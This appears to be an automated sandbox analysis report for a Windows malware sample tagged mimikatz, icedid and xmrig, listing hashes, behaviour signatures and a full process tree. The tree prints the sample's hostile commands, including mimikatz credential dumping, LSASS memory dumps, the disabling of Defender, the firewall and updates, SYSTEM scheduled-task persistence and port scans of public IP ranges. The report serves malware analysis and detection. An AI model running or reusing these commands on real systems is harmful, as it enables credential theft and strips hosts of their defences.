Overview

overview

10

Static

static

10

2024-09-14...tz.exe

windows7-x64

10

2024-09-14...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2024 11:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-09-14_62adea51f08e0d8cfdebe1a2bc16f786_hacktools_icedid_mimikatz.exe

  • Size

    8.7MB

  • MD5

    62adea51f08e0d8cfdebe1a2bc16f786

  • SHA1

    7fce3b3374e6d0e118a191fc40d5a0b842b8c088

  • SHA256

    83830027e40ccd5e86eb50c0387de4292c35628b491824b82015973c41e1b889

  • SHA512

    d4e59eb3fefd01c905d060ebd601f289705034cdbc69d0911daaa482045c73983f1c602e33dffd3b4b4db8c32c97f948f84599dc66b800945e2ddc33f3f6f8e4

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (20227) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 10 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 13 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1012
      • C:\Windows\TEMP\turtkcnue\jkczbb.exe
        "C:\Windows\TEMP\turtkcnue\jkczbb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1392
    • C:\Users\Admin\AppData\Local\Temp\2024-09-14_62adea51f08e0d8cfdebe1a2bc16f786_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-09-14_62adea51f08e0d8cfdebe1a2bc16f786_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4116
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lhirpauw\ifzaime.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:980
        • C:\Windows\lhirpauw\ifzaime.exe
          C:\Windows\lhirpauw\ifzaime.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1560
    • C:\Windows\lhirpauw\ifzaime.exe
      C:\Windows\lhirpauw\ifzaime.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2568
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4332
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:832
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1352
      • C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static del all
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2136
      • C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add policy name=Bastards description=FuckingBastards
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:4480
      • C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filteraction name=BastardsList action=block
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1036
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Windows\bnbjunmgy\itcahvdec\wpcap.exe /S
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3880
        • C:\Windows\bnbjunmgy\itcahvdec\wpcap.exe
          C:\Windows\bnbjunmgy\itcahvdec\wpcap.exe /S
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1028
          • C:\Windows\SysWOW64\net.exe
            net stop "Boundary Meter"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4296
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "Boundary Meter"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3712
          • C:\Windows\SysWOW64\net.exe
            net stop "TrueSight Meter"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3056
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "TrueSight Meter"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:956
          • C:\Windows\SysWOW64\net.exe
            net stop npf
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2432
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop npf
              5⤵
                PID:1792
            • C:\Windows\SysWOW64\net.exe
              net start npf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5008
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                5⤵
                  PID:812
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2744
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3352
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1100
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4972
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3664
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1764
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\bnbjunmgy\itcahvdec\bvncnflyu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bnbjunmgy\itcahvdec\Scant.txt
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1584
            • C:\Windows\bnbjunmgy\itcahvdec\bvncnflyu.exe
              C:\Windows\bnbjunmgy\itcahvdec\bvncnflyu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bnbjunmgy\itcahvdec\Scant.txt
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1352
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\bnbjunmgy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bnbjunmgy\Corporate\log.txt
            2⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:5072
            • C:\Windows\bnbjunmgy\Corporate\vfshost.exe
              C:\Windows\bnbjunmgy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1728
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "neieiybei" /ru system /tr "cmd /c C:\Windows\ime\ifzaime.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4012
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3192
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc minute /mo 1 /tn "neieiybei" /ru system /tr "cmd /c C:\Windows\ime\ifzaime.exe"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4668
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "felcleand" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:872
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3032
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc minute /mo 1 /tn "felcleand" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F"
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1944
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "efuycteei" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F"
            2⤵
              PID:5100
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4188
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "efuycteei" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4024
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:5084
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4476
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4880
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3312
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4300
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3592
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3636
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:312
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2460
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4572
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3964
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4888
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net stop SharedAccess
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3012
              • C:\Windows\SysWOW64\net.exe
                net stop SharedAccess
                3⤵
                • System Location Discovery: System Language Discovery
                PID:5000
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SharedAccess
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1288
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh firewall set opmode mode=disable
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4972
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall set opmode mode=disable
                3⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4976
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh Advfirewall set allprofiles state off
              2⤵
                PID:4268
                • C:\Windows\SysWOW64\netsh.exe
                  netsh Advfirewall set allprofiles state off
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:228
              • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 784 C:\Windows\TEMP\bnbjunmgy\784.dmp
                2⤵
                • Executes dropped EXE
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:2476
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net stop MpsSvc
                2⤵
                  PID:2956
                  • C:\Windows\SysWOW64\net.exe
                    net stop MpsSvc
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4440
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:592
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop WinDefend
                  2⤵
                    PID:2968
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                        PID:3892
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1592
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2076
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                          PID:1496
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop wuauserv
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1628
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config MpsSvc start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4528
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:2776
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3552
                        • C:\Windows\SysWOW64\sc.exe
                          sc config SharedAccess start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:3668
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config WinDefend start= disabled
                        2⤵
                          PID:3052
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:2456
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4688
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:2376
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2676
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 336 C:\Windows\TEMP\bnbjunmgy\336.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:644
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 1012 C:\Windows\TEMP\bnbjunmgy\1012.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:764
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2540 C:\Windows\TEMP\bnbjunmgy\2540.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4744
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2924 C:\Windows\TEMP\bnbjunmgy\2924.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3408
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2992 C:\Windows\TEMP\bnbjunmgy\2992.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2568
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2172 C:\Windows\TEMP\bnbjunmgy\2172.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3012
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 3748 C:\Windows\TEMP\bnbjunmgy\3748.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2256
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 3868 C:\Windows\TEMP\bnbjunmgy\3868.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3492
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 3936 C:\Windows\TEMP\bnbjunmgy\3936.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5100
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 4048 C:\Windows\TEMP\bnbjunmgy\4048.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2196
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2868 C:\Windows\TEMP\bnbjunmgy\2868.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:220
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 1204 C:\Windows\TEMP\bnbjunmgy\1204.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4668
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 1716 C:\Windows\TEMP\bnbjunmgy\1716.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2060
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2680 C:\Windows\TEMP\bnbjunmgy\2680.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4432
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 4032 C:\Windows\TEMP\bnbjunmgy\4032.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2632
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 4544 C:\Windows\TEMP\bnbjunmgy\4544.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3260
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c C:\Windows\bnbjunmgy\itcahvdec\scan.bat
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4404
                          • C:\Windows\bnbjunmgy\itcahvdec\hransculn.exe
                            hransculn.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:3944
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4848
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1616
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5000
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2568
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3508
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5048
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1496
                      • C:\Windows\SysWOW64\nspfso.exe
                        C:\Windows\SysWOW64\nspfso.exe
                        1⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:2620
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                        1⤵
                          PID:1616
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            2⤵
                              PID:4476
                            • C:\Windows\system32\cacls.exe
                              cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                              2⤵
                                PID:2064
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ifzaime.exe
                              1⤵
                                PID:4664
                                • C:\Windows\ime\ifzaime.exe
                                  C:\Windows\ime\ifzaime.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4780
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F
                                1⤵
                                  PID:1628
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    2⤵
                                      PID:4320
                                    • C:\Windows\system32\cacls.exe
                                      cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F
                                      2⤵
                                        PID:1792
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                                      1⤵
                                        PID:5212
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
                                            PID:4348
